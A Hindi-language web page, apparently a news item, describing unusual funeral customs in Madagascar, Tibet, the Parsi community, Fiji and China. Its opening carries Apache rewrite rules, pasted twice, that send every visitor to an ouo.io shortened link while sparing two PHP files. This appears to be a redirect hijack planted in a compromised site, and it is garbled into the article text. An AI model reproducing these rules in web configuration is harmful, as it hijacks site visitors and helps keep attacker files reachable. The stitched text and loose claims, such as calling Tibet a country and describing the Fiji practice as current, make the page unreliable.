
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 398
Nextइस धरती पर जिस व्यक्ति ने जन्म लिया है उसकी मौत अवश्य है और इंसान की मौत होने के बाद शरीर का अंतिम संस्कार किया जाता है। सभी देश और धर्म में संस्कार करने के अलग-अलग रिवाज होते है। कई जगहों पर शरीर को जलाया जाता है और कहीं दफनाया जाता है। ऐसे ही कुछ देश है जहां संस्कार के नाम पर अजीब परम्परां निभाई जाती हैं। आईए जानते है कुछ ऐसे देशों में जहां इंसान के मरने के बाद अजीब तरह से परम्परा निभाई जाती है।
मैडागास्कर: यह एक ऐसा देश है जहां मरने के बाद लाश को दफना दिया जाता है और हर साल अपने पूर्वजों को खुश करने के लिए लाश को कब्र में से निकाला जाता है और उसे सफेद कपडे पहनाकर उसके आस-पास गाकर नृत्य करते हैं। नाचने के बाद गांव का एक चक्कर लगाकर लाश को दोबारा कब्र में दफना दिया जाता है।
तिब्बत: इस देश में मरने के बाद शरीर का और भी बुरा हाल किया जाता है। यहां मरे हुए इंसान के छोटे-छोटे टुकडे काट कर उसे ऊंची पहाडी पर रख दिया जाता है। उनके अनुसार मरने के बाद व्यक्ति का शरीर किसी काम का नहीं रहता। इसलिए उसे जानवरों और पक्षियों का पेट भरने के लिए पहाडों पर छोड दिया जाता है।
पारसी समुदाय: इस समुदाय के लोगों में संस्कार की प्रथा काफी हैरान करने वाली है। यहां मृत्यु के बाद शरीर को नहला कर पारसियों के धार्मिक स्थान में छोड दिया जाता है। जहां गिद्ध आकर उस लाश को खाते हैं। पारसी समुदाय में यह प्रथा आज भी प्रचलित है।
फिजी: इस देश के कुछ इलाकों में जो व्यक्ति मर जाता है उसके परिवार के एक और सदस्य का गला घोंट कर मार दिया जाता है। वहां के लोगों का मानना है कि मृतक को इस दुनिया से अकेला नहीं जाना चाहिए।
चीन: चीन में मरने के बाद लाश को एक ताबूत में डाल दिया जाता था और उसे किसी ऊंची पहाडी से नीचे लटका दिया जाता है। वहां के लोगों का मानना था कि ऐसा करने से मरने के बाद व्यक्ति को स्वर्ग नसीब होता है लेकिन चीन देश में यह प्रथा अब बंद हो चुकी है।